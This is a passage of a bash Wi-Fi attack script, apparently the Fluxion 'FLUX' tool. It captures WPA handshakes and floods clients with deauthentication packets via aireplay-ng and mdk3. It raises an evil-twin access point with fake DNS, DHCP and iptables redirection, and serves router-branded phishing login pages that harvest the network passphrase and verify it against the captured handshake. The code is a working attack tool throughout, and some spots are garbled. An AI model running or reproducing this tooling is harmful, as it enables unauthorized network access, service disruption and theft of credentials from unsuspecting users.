break;; 3 ) killall airodump-ng mdk3 aireplay-ng xterm &>$flux_output_device; CSVDB=dump-01.csv; breakmode=1; killall xterm; selection; break ;; 4 ) exitmode; break;; * ) echo " $general_case_error"; conditional_clear ;; esac done fi } # Capture all function capture { conditional_clear if ! ps -A | grep -q airodump-ng; then rm -rf $DUMP_PATH/$Host_MAC* xterm $HOLD -title "Capturing data on channel --> $Host_CHAN" $TOPRIGHT -bg "#000000" -fg "#FFFFFF" -e airodump-ng --bssid $Host_MAC -w $DUMP_PATH/$Host_MAC -c $Host_CHAN -a $WIFI_MONITOR --ignore-negative-one & fi } # Check the handshake before continuing function checkhandshake { if [ "$handshakemode" = "normal" ]; then if aircrack-ng $DUMP_PATH/$Host_MAC-01.cap | grep -q "1 handshake"; then killall airodump-ng mdk3 aireplay-ng &>$flux_output_device wpaclean $HANDSHAKE_PATH/$Host_SSID2-$Host_MAC.cap $DUMP_PATH/$Host_MAC-01.cap &>$flux_output_device certssl i=2 break else Handshake_statuscheck="${red}Not_Found$transparent" fi elif [ "$handshakemode" = "hard" ]; then pyrit -r $DUMP_PATH/$Host_MAC-01.cap -o $DUMP_PATH/test.cap stripLive &>$flux_output_device if pyrit -r $DUMP_PATH/test.cap analyze 2>&1 | grep -q "good,"; then killall airodump-ng mdk3 aireplay-ng &>$flux_output_device pyrit -r $DUMP_PATH/test.cap -o $HANDSHAKE_PATH/$Host_SSID2-$Host_MAC.cap strip &>$flux_output_device certssl i=2 break else if aircrack-ng $DUMP_PATH/$Host_MAC-01.cap | grep -q "1 handshake"; then Handshake_statuscheck="${yellow}Corrupted$transparent" else Handshake_statuscheck="${red}Not_found$transparent" fi fi rm $DUMP_PATH/test.cap &>$flux_output_device fi } ############################################# < HANDSHAKE > ############################################ function certssl { # Test if the ssl certificate is generated correcly if there is any if [ -f $DUMP_PATH/server.pem ]; then if [ -s $DUMP_PATH/server.pem ]; then webinterface break else if [ "$FLUX_AUTO" = "1" ];then creassl fi while true;do conditional_clear top echo " " echo -e ""$red"["$yellow"2"$red"]"$transparent" Certificate invalid or not present, please choose an option" echo " " echo -e " "$red"["$yellow"1"$red"]"$grey" Create a SSL certificate" echo -e " "$red"["$yellow"2"$red"]"$transparent" Search for SSL certificate" # hop to certssl check again echo -e " "$red"["$yellow"3"$red"]"$red" Exit" $transparent echo " " echo -n ' #> ' read yn case $yn in 1 ) creassl;; 2 ) certssl;break;; 3 ) exitmode; break;; * ) echo "$general_case_error"; conditional_clear esac done fi else if [ "$FLUX_AUTO" = "1" ];then creassl fi while true; do conditional_clear top echo " " echo " Certificate invalid or not present, please choice" echo " " echo -e " "$red"["$yellow"1"$red"]"$grey" Create a SSL certificate" echo -e " "$red"["$yellow"2"$red"]"$transparent" Search for SSl certificate" # hop to certssl check again echo -e " "$red"["$yellow"3"$red"]"$red" Exit" $transparent echo " " echo -n ' #> ' read yn case $yn in 1 ) creassl;; 2 ) certssl; break;; 3 ) exitmode; break;; * ) echo "$general_case_error"; conditional_clear esac done fi } # Create Self-Signed SSL Certificate function creassl { xterm -title "Create Self-Signed SSL Certificate" -e openssl req -subj '/CN=SEGURO/O=SEGURA/OU=SEGURA/C=US' -new -newkey rsa:2048 -days 365 -nodes -x509 -keyout /$DUMP_PATH/server.pem -out /$DUMP_PATH/server.pem # more details there certssl } ############################################# < ATAQUE > ############################################ # Select attack strategie that will be used function webinterface { chmod 400 $DUMP_PATH/server.pem if [ "$FLUX_AUTO" = "1" ];then matartodo; ConnectionRESET; selection else while true; do conditional_clear top infoap echo echo -e ""$red"["$yellow"2"$red"]"$transparent" $header_webinterface" echo echo -e " "$red"["$yellow"1"$red"]"$grey" Web Interface" echo -e " "$red"["$yellow"2"$red"]"$transparent" \e[1;31mExit"$transparent"" echo echo -n "#? " read yn case $yn in 1 ) matartodo; ConnectionRESET; selection; break;; 2 ) matartodo; exitmode; break;; esac done fi } function ConnectionRESET { if [ "$FLUX_AUTO" = "1" ];then webconf=1 else while true; do conditional_clear top infoap n=1 echo echo -e ""$red"["$yellow"2"$red"]"$transparent" $header_ConnectionRESET" echo echo -e " "$red"["$yellow"$n"$red"]"$transparent" English [ENG] (NEUTRA)";n=`expr $n + 1` echo -e " "$red"["$yellow"$n"$red"]"$transparent" German [GER] (NEUTRA)";n=`expr $n + 1` echo -e " "$red"["$yellow"$n"$red"]"$transparent" Russian [RUS] (NEUTRA)";n=`expr $n + 1` echo -e " "$red"["$yellow"$n"$red"]"$transparent" Italian [IT] (NEUTRA)";n=`expr $n + 1` echo -e " "$red"["$yellow"$n"$red"]"$transparent" Spanish [ESP] (NEUTRA)";n=`expr $n + 1` echo -e " "$red"["$yellow"$n"$red"]"$transparent" Portuguese [POR] (NEUTRA)";n=`expr $n + 1` echo -e " "$red"["$yellow"$n"$red"]"$transparent" Chinese [CN] (NEUTRA)";n=`expr $n + 1` echo -e " "$red"["$yellow"$n"$red"]"$transparent" French [FR] (NEUTRA)";n=`expr $n + 1` echo -e " "$red"["$yellow"$n"$red"]"$transparent" Turkish [TR] (NEUTRA)";n=`expr $n + 1` echo -e " "$red"["$yellow"$n"$red"]"$transparent" Romanian [RO] (NEUTRA)";n=`expr $n + 1` echo -e " "$red"["$yellow"$n"$red"]"$transparent" Hungarian [HU] (NEUTRA)";n=`expr $n + 1` echo -e " "$red"["$yellow"$n"$red"]"$transparent" Arabic [ARA] (NEUTRA)";n=`expr $n + 1` echo -e " "$red"["$yellow"$n"$red"]"$transparent" Greek [GR] (NEUTRA)";n=`expr $n + 1` echo -e " "$red"["$yellow"$n"$red"]"$transparent" Czech [CZ] (NEUTRA)";n=`expr $n + 1` echo -e " "$red"["$yellow"$n"$red"]"$transparent" Norwegian [NO] (NEUTRA)";n=`expr $n + 1` echo -e " "$red"["$yellow"$n"$red"]"$transparent" Bulgarian [BG] (NEUTRA)";n=`expr $n + 1` echo -e " "$red"["$yellow"$n"$red"]"$transparent" Serbian [SRB] (NEUTRA)";n=`expr $n + 1` echo -e " "$red"["$yellow"$n"$red"]"$transparent" Polish [PL] (NEUTRA)";n=`expr $n + 1` echo -e " "$red"["$yellow"$n"$red"]"$transparent" Indonesian [ID] (NEUTRA)";n=`expr $n + 1` echo -e " "$red"["$yellow"$n"$red"]"$transparent" Dutch [NL] (NEUTRA)";n=`expr $n + 1` echo -e " "$red"["$yellow"$n"$red"]"$transparent" Danish [DAN] (NEUTRA)";n=`expr $n + 1` echo -e " "$red"["$yellow"$n"$red"]"$transparent" Hebrew [HE] (NEUTRA)";n=`expr $n + 1` echo -e " "$red"["$yellow"$n"$red"]"$transparent" Thai [TH] (NEUTRA)";n=`expr $n + 1` echo -e " "$red"["$yellow"$n"$red"]"$transparent" Portuguese [BR] (NEUTRA)";n=`expr $n + 1` echo -e " "$red"["$yellow"$n"$red"]"$transparent" Slovenian [SVN] (NEUTRA)";n=`expr $n + 1` echo -e " "$red"["$yellow"$n"$red"]"$transparent" Belkin [ENG]";n=`expr $n + 1` echo -e " "$red"["$yellow"$n"$red"]"$transparent" Netgear [ENG]";n=`expr $n + 1` echo -e " "$red"["$yellow"$n"$red"]"$transparent" Huawei [ENG]";n=`expr $n + 1` echo -e " "$red"["$yellow"$n"$red"]"$transparent" Verizon [ENG]";n=`expr $n + 1` echo -e " "$red"["$yellow"$n"$red"]"$transparent" Netgear [ESP]";n=`expr $n + 1` echo -e " "$red"["$yellow"$n"$red"]"$transparent" Arris [ESP]";n=`expr $n + 1` echo -e " "$red"["$yellow"$n"$red"]"$transparent" Vodafone [ESP]";n=`expr $n + 1` echo -e " "$red"["$yellow"$n"$red"]"$transparent" TP-Link [ENG]";n=`expr $n + 1` echo -e " "$red"["$yellow"$n"$red"]"$transparent" Ziggo [NL]";n=` expr $n + 1` echo -e " "$red"["$yellow"$n"$red"]"$transparent" KPN [NL]";n=` expr $n + 1` echo -e " "$red"["$yellow"$n"$red"]"$transparent" Ziggo2016 [NL]";n=` expr $n + 1` echo -e " "$red"["$yellow"$n"$red"]"$transparent" FRITZBOX_DE [DE] ";n=` expr $n + 1` echo -e " "$red"["$yellow"$n"$red"]"$transparent" FRITZBOX_ENG[ENG] ";n=` expr $n + 1` echo -e " "$red"["$yellow"$n"$red"]"$transparent" GENEXIS_DE [DE] ";n=` expr $n + 1` echo -e " "$red"["$yellow"$n"$red"]"$transparent" Login-Netgear[Login-Netgear] ";n=` expr $n + 1` echo -e " "$red"["$yellow"$n"$red"]"$transparent" Login-Xfinity[Login-Xfinity] ";n=` expr $n + 1` echo -e " "$red"["$yellow"$n"$red"]"$transparent" Telekom ";n=` expr $n + 1` echo -e " "$red"["$yellow"$n"$red"]"$transparent" Google";n=` expr $n + 1` echo -e " "$red"["$yellow"$n"$red"]"$transparent" MOVISTAR [ESP]";n=`expr $n + 1` echo -e " "$red"["$yellow"$n"$red"]"$transparent"\e[1;31m $general_back"$transparent"" echo echo -n "#? " read webconf if [ "$webconf" = "1" ]; then DIALOG_WEB_ERROR=$DIALOG_WEB_ERROR_ENG DIALOG_WEB_INFO=$DIALOG_WEB_INFO_ENG DIALOG_WEB_INPUT=$DIALOG_WEB_INPUT_ENG DIALOG_WEB_OK=$DIALOG_WEB_OK_ENG DIALOG_WEB_SUBMIT=$DIALOG_WEB_SUBMIT_ENG DIALOG_WEB_BACK=$DIALOG_WEB_BACK_ENG DIALOG_WEB_ERROR_MSG=$DIALOG_WEB_ERROR_MSG_ENG DIALOG_WEB_LENGTH_MIN=$DIALOG_WEB_LENGTH_MIN_ENG DIALOG_WEB_LENGTH_MAX=$DIALOG_WEB_LENGTH_MAX_ENG DIALOG_WEB_DIR=$DIALOG_WEB_DIR_ENG NEUTRA break elif [ "$webconf" = "2" ]; then DIALOG_WEB_ERROR=$DIALOG_WEB_ERROR_GER DIALOG_WEB_INFO=$DIALOG_WEB_INFO_GER DIALOG_WEB_INPUT=$DIALOG_WEB_INPUT_GER DIALOG_WEB_OK=$DIALOG_WEB_OK_GER DIALOG_WEB_SUBMIT=$DIALOG_WEB_SUBMIT_GER DIALOG_WEB_BACK=$DIALOG_WEB_BACK_GER DIALOG_WEB_ERROR_MSG=$DIALOG_WEB_ERROR_MSG_GER DIALOG_WEB_LENGTH_MIN=$DIALOG_WEB_LENGTH_MIN_GER DIALOG_WEB_LENGTH_MAX=$DIALOG_WEB_LENGTH_MAX_GER DIALOG_WEB_DIR=$DIALOG_WEB_DIR_GER NEUTRA break elif [ "$webconf" = "3" ]; then DIALOG_WEB_ERROR=$DIALOG_WEB_ERROR_RUS DIALOG_WEB_INFO=$DIALOG_WEB_INFO_RUS DIALOG_WEB_INPUT=$DIALOG_WEB_INPUT_RUS DIALOG_WEB_OK=$DIALOG_WEB_OK_RUS DIALOG_WEB_SUBMIT=$DIALOG_WEB_SUBMIT_RUS DIALOG_WEB_BACK=$DIALOG_WEB_BACK_RUS DIALOG_WEB_ERROR_MSG=$DIALOG_WEB_ERROR_MSG_RUS DIALOG_WEB_LENGTH_MIN=$DIALOG_WEB_LENGTH_MIN_RUS DIALOG_WEB_LENGTH_MAX=$DIALOG_WEB_LENGTH_MAX_RUS DIALOG_WEB_DIR=$DIALOG_WEB_DIR_RUS NEUTRA break elif [ "$webconf" = "4" ]; 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then DIALOG_WEB_ERROR=$DIALOG_WEB_ERROR_PT_SVN DIALOG_WEB_INFO=$DIALOG_WEB_INFO_PT_SVN DIALOG_WEB_INPUT=$DIALOG_WEB_INPUT_PT_SVN DIALOG_WEB_OK=$DIALOG_WEB_OK_PT_SVN DIALOG_WEB_SUBMIT=$DIALOG_WEB_SUBMIT_ DIALOG_WEB_BACK=$DIALOG_WEB_BACK_ DIALOG_WEB_ERROR_MSG=$DIALOG_WEB_ERROR_MSG_ DIALOG_WEB_LENGTH_MIN=$DIALOG_WEB_LENGTH_MIN_PT_SVN DIALOG_WEB_LENGTH_MAX=$DIALOG_WEB_LENGTH_MAX_PT_SVN DIALOG_WEB_DIR=$DIALOG_WEB_DIR_PT_SVN NEUTRA SVNeak elif [ "$webconf" = "26" ]; then BELKIN break elif [ "$webconf" = "27" ]; then NETGEAR break elif [ "$webconf" = "28" ]; then HUAWEI break elif [ "$webconf" = "29" ]; then VERIZON break elif [ "$webconf" = "30" ]; then NETGEAR2 break elif [ "$webconf" = "31" ]; then ARRIS2 break elif [ "$webconf" = "32" ]; then VODAFONE break elif [ "$webconf" = "33" ]; then TPLINK break elif [ "$webconf" = "34" ]; then ZIGGO_NL break elif [ "$webconf" = "35" ]; then KPN_NL break elif [ "$webconf" = "36" ]; then ZIGGO2016_NL break elif [ "$webconf" = "37" ]; then FRITZBOX_DE break elif [ "$webconf" = "38" ]; then FRITZBOX_ENG break elif [ "$webconf" = "39" ]; then GENEXIS_DE break elif [ "$webconf" = "40" ]; then Login-Netgear break elif [ "$webconf" = "41" ]; then Login-Xfinity break elif [ "$webconf" = "42" ]; then Telekom break elif [ "$webconf" = "43" ]; then google break elif [ "$webconf" = "44" ]; then MOVISTAR_ES break elif [ "$webconf" = "45" ]; then conditional_clear webinterface break fi done fi preattack attack } # Create different settings required for the script function preattack { # Config HostAPD echo "interface=$WIFI driver=nl80211 ssid=$Host_SSID channel=$Host_CHAN" > $DUMP_PATH/hostapd.conf # Creates PHP echo "<?php error_reporting(0); \$count_my_page = (\"$DUMP_PATH/hit.txt\"); \$hits = file(\$count_my_page); \$hits[0] ++; \$fp = fopen(\$count_my_page , \"w\"); fputs(\$fp , \$hits[0]); fclose(\$fp); // Receive form Post data and Saving it in variables \$key1 = @\$_POST['key1']; // Write the name of text file where data will be store \$filename = \"$DUMP_PATH/data.txt\"; \$filename2 = \"$DUMP_PATH/status.txt\"; \$intento = \"$DUMP_PATH/intento\"; \$attemptlog = \"$DUMP_PATH/pwattempt.txt\"; // Marge all the variables with text in a single variable. \$f_data= ''.\$key1.''; \$pwlog = fopen(\$attemptlog, \"w\"); fwrite(\$pwlog, \$f_data); fwrite(\$pwlog,\"\n\"); fclose(\$pwlog); \$file = fopen(\$filename, \"w\"); fwrite(\$file, \$f_data); fwrite(\$file,\"\n\"); fclose(\$file); \$archivo = fopen(\$intento, \"w\"); fwrite(\$archivo,\"\n\"); fclose(\$archivo); while( 1 ) { if (file_get_contents( \$intento ) == 1) { header(\"Location:error.html\"); unlink(\$intento); break; } if (file_get_contents( \$intento ) == 2) { header(\"Location:final.html\"); break; } sleep(1); } ?>" > $DUMP_PATH/data/check.php # Config DHCP echo "authoritative; default-lease-time 600; max-lease-time 7200; subnet $RANG_IP.0 netmask { option broadcast-address $RANG_IP.255; option routers $IP; option subnet-mask; option domain-name-servers $IP; range $RANG_IP.100 $RANG_IP.250; }" > $DUMP_PATH/dhcpd.conf #create an empty leases file touch $DUMP_PATH/dhcpd.leases # creates Lighttpd web-server echo "server.document-root = \"$DUMP_PATH/data/\" server.modules = ( \"mod_access\", \"mod_alias\", \"mod_accesslog\", \"mod_fastcgi\", \"mod_redirect\", \"mod_rewrite\" ) fastcgi.server = ( \".php\" => (( \"bin-path\" => \"/usr/bin/php-cgi\", \"socket\" => \"/php.socket\" ))) server.port = 80 = \"/var/run/\" # server.username = \"www\" # server.groupname = \"www\" mimetype.assign = ( \".html\" => \"text/html\", \".htm\" => \"text/html\", \".txt\" => \"text/plain\", \".jpg\" => \"image/jpeg\", \".png\" => \"image/png\", \".css\" => \"text/css\" ) server.error-handler-404 = \"/\" static-file.exclude-extensions = ( \".fcgi\", \".php\", \".rb\", \"~\", \".inc\" ) index-file.names = ( \"index.htm\", \"index.html\" ) \$SERVER[\"socket\"] == \":443\" { url.redirect = ( \"^/(.*)\" => \"\") ssl.engine = \"enable\" ssl.pemfile = \"$DUMP_PATH/server.pem\" } #Redirect to \$HTTP[\"host\"] =~ \"^www\.(.*)$\" { url.redirect = ( \"^/(.*)\" => \"http://%1/\$1\" ) ssl.engine = \"enable\" ssl.pemfile = \"$DUMP_PATH/server.pem\" } " >$DUMP_PATH/lighttpd.conf # that redirects all DNS requests to the gateway echo "import socket class DNSQuery: def __init__(self, data): self.dominio='' tipo = (ord(data[2]) >> 3) & 15 if tipo == 0: ini=12 lon=ord(data[ini]) while lon != 0: self.dominio+=data[ini+1:ini+lon+1]+'.' ini+=lon+1 lon=ord(data[ini]) def respuesta(self, ip): packet='' if self.dominio:[:2] + \"\x81\x80\"[4:6] +[4:6] + '\x00\x00\x00\x00'[12:] packet+='\xc0\x0c' packet+='\x00\x01\x00\x01\x00\x00\x00\x3c\x00\x04' packet+=str.join('',map(lambda x: chr(int(x)), ip.split('.'))) return packet if __name__ == '__main__': ip='$IP' print 'pyminifakeDwebconfNS:: dom.query. 60 IN A %s' % ip udps = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) udps.bind(('',53)) try: while 1: data, addr = udps.recvfrom(1024) p=DNSQuery(data) udps.sendto(p.respuesta(ip), addr) print 'Request: %s -> %s' % (p.dominio, ip) except KeyboardInterrupt: print 'Finalizando' udps.close()" > $DUMP_PATH/fakedns chmod +x $DUMP_PATH/fakedns } # Set up DHCP / WEB server # Set up DHCP / WEB server function routear { ifconfig $interfaceroutear up ifconfig $interfaceroutear $IP netmask route add -net $RANG_IP.0 netmask gw $IP sysctl -w net.ipv4.ip_forward=1 &>$flux_output_device iptables --flush iptables --table nat --flush iptables --delete-chain iptables --table nat --delete-chain iptables -P FORWARD ACCEPT iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination $IP:80 iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT --to-destination $IP:443 iptables -A INPUT -p tcp --sport 443 -j ACCEPT iptables -A OUTPUT -p tcp --dport 443 -j ACCEPT iptables -t nat -A POSTROUTING -j MASQUERADE } # Attack function attack { interfaceroutear=$WIFI handshakecheck nomac=$(tr -dc A-F0-9 < /dev/urandom | fold -w2 |head -n100 | grep -v "${mac:13:1}" | head -c 1) if [ "$fakeapmode" = "hostapd" ]; then ifconfig $WIFI down sleep 0.4 macchanger --mac=${mac::13}$nomac${mac:14:4} $WIFI &> $flux_output_device sleep 0.4 ifconfig $WIFI up sleep 0.4 fi if [ $fakeapmode = "hostapd" ]; then killall hostapd &> $flux_output_device xterm $HOLD $BOTTOMRIGHT -bg "#000000" -fg "#FFFFFF" -title "AP" -e hostapd $DUMP_PATH/hostapd.conf & elif [ $fakeapmode = "airbase-ng" ]; then killall airbase-ng &> $flux_output_device xterm $BOTTOMRIGHT -bg "#000000" -fg "#FFFFFF" -title "AP" -e airbase-ng -P -e $Host_SSID -c $Host_CHAN -a ${mac::13}$nomac${mac:14:4} $WIFI_MONITOR & fi sleep 5 routear & sleep 3 killall dhcpd &> $flux_output_device fuser -n tcp -k 53 67 80 &> $flux_output_device fuser -n udp -k 53 67 80 &> $flux_output_device xterm -bg black -fg green $TOPLEFT -T DHCP -e "dhcpd -d -f -lf "$DUMP_PATH/dhcpd.leases" -cf "$DUMP_PATH/dhcpd.conf" $interfaceroutear 2>&1 | tee -a $DUMP_PATH/clientes.txt" & xterm $BOTTOMLEFT -bg "#000000" -fg "#99CCFF" -title "FAKEDNS" -e "if type python2 >/dev/null 2>/dev/null; then python2 $DUMP_PATH/fakedns; else python $DUMP_PATH/fakedns; fi" & lighttpd -f $DUMP_PATH/lighttpd.conf &> $flux_output_device killall aireplay-ng &> $flux_output_device killall mdk3 &> $flux_output_device echo "$Host_MAC" >$DUMP_PATH/mdk3.txt xterm $HOLD $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" -title "Deauth all [mdk3] $Host_SSID" -e mdk3 $WIFI_MONITOR d -b $DUMP_PATH/mdk3.txt -c $Host_CHAN & xterm -hold $TOPRIGHT -title "Wifi Information" -e $DUMP_PATH/handcheck & conditional_clear while true; do top echo -e ""$red"["$yellow"2"$red"]"$transparent" Attack in progress .." echo " " echo " 1) Choose another network" echo " 2) Exit" echo " " echo -n ' #> ' read yn case $yn in 1 ) matartodo; CSVDB=dump-01.csv; selection; break;; 2 ) matartodo; exitmode; break;; * ) echo " $general_case_error"; conditional_clear ;; esac done } # Checks the validity of the password function handshakecheck { echo "#!/bin/bash echo > $DUMP_PATH/data.txt echo -n \"0\"> $DUMP_PATH/hit.txt echo "" >$DUMP_PATH/loggg tput civis clear minutos=0 horas=0 i=0 timestamp=\$(date +%s) while true; do segundos=\$i dias=\`expr \$segundos / 86400\` segundos=\`expr \$segundos % 86400\` horas=\`expr \$segundos / 3600\` segundos=\`expr \$segundos % 3600\` minutos=\`expr \$segundos / 60\` segundos=\`expr \$segundos % 60\` if [ \"\$segundos\" -le 9 ]; then is=\"0\" else is= fi if [ \"\$minutos\" -le 9 ]; then im=\"0\" else im= fi if [ \"\$horas\" -le 9 ]; then ih=\"0\" else ih= fi">>$DUMP_PATH/handcheck if [ $authmode = "handshake" ]; then echo "if [ -f $DUMP_PATH/pwattempt.txt ]; then cat $DUMP_PATH/pwattempt.txt >> \"$PASSLOG_PATH/$Host_SSID-$Host_MAC.log\" rm -f $DUMP_PATH/pwattempt.txt fi if [ -f $DUMP_PATH/intento ]; then if ! aircrack-ng -w $DUMP_PATH/data.txt $DUMP_PATH/$Host_MAC-01.cap | grep -qi \"Passphrase not in\"; then echo \"2\">$DUMP_PATH/intento break else echo \"1\">$DUMP_PATH/intento fi fi">>$DUMP_PATH/handcheck elif [ $authmode = "wpa_supplicant" ]; then echo " if [ -f $DUMP_PATH/pwattempt.txt ]; then cat $DUMP_PATH/pwattempt.txt >> $PASSLOG_PATH/$Host_SSID-$Host_MAC.log rm -f $DUMP_PATH/pwattempt.txt fi wpa_passphrase $Host_SSID \$(cat $DUMP_PATH/data.txt)>$DUMP_PATH/wpa_supplicant.conf & wpa_supplicant -i$WIFI -c$DUMP_PATH/wpa_supplicant.conf -f $DUMP_PATH/loggg & if [ -f $DUMP_PATH/intento ]; then if grep -i 'WPA: Key negotiation completed' $DUMP_PATH/loggg; then echo \"2\">$DUMP_PATH/intento break else echo \"1\">$DUMP_PATH/intento fi fi ">>$DUMP_PATH/handcheck fi echo "readarray -t CLIENTESDHCP < <(nmap -PR -sn -n -oG - $RANG_IP.100-110 2>&1 | grep Host ) echo echo -e \" ACCESS POINT:\" echo -e \" SSID............: "$white"$Host_SSID"$transparent"\" echo -e \" MAC.............: "$yellow"$Host_MAC"$transparent"\" echo -e \" Channel.........: "$white"$Host_CHAN"$transparent"\" echo -e \" Vendor..........: "$green"$Host_MAC_MODEL"$transparent"\" echo -e \" Operation time..: "$blue"\$ih\$horas:\$im\$minutos:\$is\$segundos"$transparent"\" echo -e \" Attempts........: "$red"\$(cat $DUMP_PATH/hit.txt)"$transparent"\" echo -e \" Clients.........: "$blue"\$(cat $DUMP_PATH/clientes.txt | grep DHCPACK | awk '{print \$5}' | sort| uniq | wc -l)"$transparent"\" echo echo -e \" CLIENTS ONLINE:\" x=0 for cliente in \"\${CLIENTESDHCP[@]}\"; do x=\$((\$x+1)) CLIENTE_IP=\$(echo \$cliente| cut -d \" \" -f2) CLIENTE_MAC=\$(nmap -PR -sn -n \$CLIENTE_IP 2>&1 | grep -i mac | awk '{print \$3}' | tr [:upper:] [:lower:]) if [ \"\$(echo \$CLIENTE_MAC| wc -m)\" != \"18\" ]; then CLIENTE_MAC=\"xx:xx:xx:xx:xx:xx\" fi CLIENTE_FABRICANTE=\$(macchanger -l | grep \"\$(echo \"\$CLIENTE_MAC\" | cut -d \":\" -f -3)\" | cut -d \" \" -f 5-) if echo \$CLIENTE_MAC| grep -q x; then CLIENTE_FABRICANTE=\"unknown\" fi CLIENTE_HOSTNAME=\$(grep \$CLIENTE_IP $DUMP_PATH/clientes.txt | grep DHCPACK | sort | uniq | head -1 | grep '(' | awk -F '(' '{print \$2}' | awk -F ')' '{print \$1}') echo -e \" $green \$x) $red\$CLIENTE_IP $yellow\$CLIENTE_MAC $transparent($blue\$CLIENTE_FABRICANTE$transparent) $green \$CLIENTE_HOSTNAME$transparent\" done echo -ne \"\033[K\033[u\"">>$DUMP_PATH/handcheck if [ $authmode = "handshake" ]; then echo "let i=\$(date +%s)-\$timestamp sleep 1">>$DUMP_PATH/handcheck elif [ $authmode = "wpa_supplicant" ]; then echo "sleep 5 killall wpa_supplicant &>$flux_output_device killall wpa_passphrase &>$flux_output_device let i=\$i+5">>$DUMP_PATH/handcheck fi echo "done clear echo \"1\" > $DUMP_PATH/status.txt sleep 7 killall mdk3 &>$flux_output_device killall aireplay-ng &>$flux_output_device killall airbase-ng &>$flux_output_device kill \$(ps a | grep python| grep fakedns | awk '{print \$1}') &>$flux_output_device killall hostapd &>$flux_output_device killall lighttpd &>$flux_output_device killall dhcpd &>$flux_output_device killall wpa_supplicant &>$flux_output_device killall wpa_passphrase &>$flux_output_device echo \" FLUX $version by ghost SSID: $Host_SSID BSSID: $Host_MAC ($Host_MAC_MODEL) Channel: $Host_CHAN Security: $Host_ENC Time: \$ih\$horas:\$im\$minutos:\$is\$segundos Password: \$(cat $DUMP_PATH/data.txt) \" >\"$HOME/$Host_SSID-password.txt\"">>$DUMP_PATH/handcheck if [ $authmode = "handshake" ]; then echo "aircrack-ng -a 2 -b $Host_MAC -0 -s $DUMP_PATH/$Host_MAC-01.cap -w $DUMP_PATH/data.txt && echo && echo -e \"The password was saved in "$red"$HOME/$Host_SSID-password.txt"$transparent"\" ">>$DUMP_PATH/handcheck elif [ $authmode = "wpa_supplicant" ]; then echo "echo -e \"The password was saved in "$red"$HOME/$Host_SSID-password.txt"$transparent"\"">>$DUMP_PATH/handcheck fi echo "kill -INT \$(ps a | grep bash| grep flux | awk '{print \$1}') &>$flux_output_device">>$DUMP_PATH/handcheck chmod +x $DUMP_PATH/handcheck } ############################################# < ATTACK > ############################################ ############################################## < STUFF > ############################################ # Deauth all function deauthall { xterm $HOLD $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" -title "Deauthenticating all clients on $Host_SSID" -e aireplay-ng --deauth $DEAUTHTIME -a $Host_MAC --ignore-negative-one $WIFI_MONITOR & } function deauthmdk3 { echo "$Host_MAC" >$DUMP_PATH/mdk3.txt xterm $HOLD $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" -title "Deauthenticating via mdk3 all clients on $Host_SSID" -e mdk3 $WIFI_MONITOR d -b $DUMP_PATH/mdk3.txt -c $Host_CHAN & mdk3PID=$! } # Deauth to a specific target function deauthesp { sleep 2 xterm $HOLD $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" -title "Deauthenticating client $Client_MAC" -e aireplay-ng -0 $DEAUTHTIME -a $Host_MAC -c $Client_MAC --ignore-negative-one $WIFI_MONITOR & } # Close all processes function matartodo { killall aireplay-ng &>$flux_output_device kill $(ps a | grep python| grep fakedns | awk '{print $1}') &>$flux_output_device killall hostapd &>$flux_output_device killall lighttpd &>$flux_output_device killall dhcpd &>$flux_output_device killall xterm &>$flux_output_device } ######################################### < INTERFACE WEB > ######################################## # Create the contents for the web interface function NEUTRA { if [ ! -d $DUMP_PATH/data ]; then mkdir $DUMP_PATH/data fi source $WORK_DIR/lib/site/index | base64 -d > $DUMP_PATH/ unzip $DUMP_PATH/ -d $DUMP_PATH/data &>$flux_output_device rm $DUMP_PATH/ &>$flux_output_device echo "<!DOCTYPE html> <html> <head> <title>Login Page</title> <meta charset=\"UTF-8\"> <meta name=\"viewport\" content=\"width=device-width, height=device-height, initial-scale=1.0\"> <!-- Styles --> <link rel=\"stylesheet\" type=\"text/css\" href=\"css/\"/> <link rel=\"stylesheet\" type=\"text/css\" href=\"css/main.css\"/> <!-- Scripts --> <script src=\"js/jquery-1.11.1.min.js\"></script> <script src=\"js/\"></script> </head> <body> <!-- final page --> <div id=\"done\" data-role=\"page\" data-theme=\"a\"> <div data-role=\"main\" class=\"ui-content ui-body ui-body-b\" dir=\"$DIALOG_WEB_DIR\"> <h3 style=\"text-align:center;\">$DIALOG_WEB_OK</h3> </div> </div> </body> </html>" > $DUMP_PATH/data/final.html echo "<!DOCTYPE html> <html> <head> <title>Login Page</title> <meta charset=\"UTF-8\"> <meta name=\"viewport\" content=\"width=device-width, height=device-height, initial-scale=1.0\"> <!-- Styles --> <link rel=\"stylesheet\" type=\"text/css\" href=\"css/\"/> <link rel=\"stylesheet\" type=\"text/css\" href=\"css/main.css\"/> <!-- Scripts --> <script src=\"js/jquery-1.11.1.min.js\"></script> <script src=\"js/\"></script> <script src=\"js/jquery.validate.min.js\"></script> <script src=\"js/additional-methods.min.js\"></script> </head> <body> <!-- Error page --> <div data-role=\"page\" data-theme=\"a\"> <div data-role=\"main\" class=\"ui-content ui-body ui-body-b\" dir=\"$DIALOG_WEB_DIR\"> <h3 style=\"text-align:center;\">$DIALOG_WEB_ERROR</h3> <a href=\"index.htm\" class=\"ui-btn ui-corner-all ui-shadow\" onclick=\"location.href='index.htm'\">$DIALOG_WEB_BACK</a> </div> </div> </body> </html>" > $DUMP_PATH/data/error.html echo "<!DOCTYPE html> <html> <head> <title>Login Page</title> <meta charset=\"UTF-8\"> <meta name=\"viewport\" content=\"width=device-width, height=device-height, initial-scale=1.0\"> <!-- Styles --> <link rel=\"stylesheet\" type=\"text/css\" href=\"css/\"/> <link rel=\"stylesheet\" type=\"text/css\" href=\"css/main.css\"/> <!-- Scripts --> <script src=\"js/jquery-1.11.1.min.js\"></script> <script src=\"js/\"></script> <script src=\"js/jquery.validate.min.js\"></script> <script src=\"js/additional-methods.min.js\"></script> </head> <body> <!-- Main page --> <div data-role=\"page\" data-theme=\"a\"> <div class=\"ui-content\" dir=\"$DIALOG_WEB_DIR\"> <fieldset> <form id=\"loginForm\" class=\"ui-body ui-body-b ui-corner-all\" action=\"check.php\" method=\"POST\"> </br> <div class=\"ui-field-contain ui-responsive\" style=\"text-align:center;\"> <div>ESSID: <u>$Host_SSID</u></div> <div>BSSID: 